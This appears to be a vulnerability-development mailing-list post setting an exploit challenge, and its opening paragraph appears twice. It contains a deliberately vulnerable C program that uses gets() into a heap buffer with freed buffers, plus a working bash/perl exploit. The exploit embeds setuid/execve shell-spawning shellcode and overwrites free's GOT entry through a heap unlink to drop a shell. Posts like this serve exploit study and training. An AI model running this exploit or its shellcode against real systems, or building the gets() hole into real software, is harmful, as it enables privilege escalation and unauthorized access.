Having been with the vulndev mailing list for a while now without
seeing an exploit challenge, I thought I would offer one up for
the masses... However this vulnerability is simple in design yet
appears to be difficult to exploit in C...
I have supplied a working bash script for the vuln, but it relies upon
the perl interpreter to supply the payload...
The challenge is to create a working exploit in C, and not perl, bash.
Having been with the vulndev mailing list for a while now without
seeing an exploit challenge, I thought I would offer one up for
the masses... However this vulnerability is simple in design yet
appears to be difficult to exploit in C...
I have supplied a working bash script for the vuln, but it relies upon
the perl interpreter to supply the payload...
The challenge is to create a working exploit in C, and not perl, bash.
/* vuln.c */
/* familiar? ... */
#define LEN 256
int main(void) {
char *buf1 = (char *)malloc(LEN);
char *buf2 = (char *)malloc(LEN);
printf("buf1: %p\n", buf1);
printf("buf2: %p\n", buf2);
gets(buf1);
free(buf2);
free(buf1);
}
Notice the gets() function and the ordering of the free()'s..
The bash script using perl is as follows...
#!/bin/sh
# Thanks je
# No error checking
shellcode=`
printf "\xeb\x10AAAABBBBCCCCDDDD"
printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
`
prog=./vuln
dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'`
code_addr=`perl -e
'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'
`
echo "Shell dropped"
(perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) .
pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| env - shellcode=$shellcode ./vuln
exit 0
Hopefully I shall get responses to this challenge,...
Regards...
//-----=[ EOF ]=-----//
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .
[ reply ]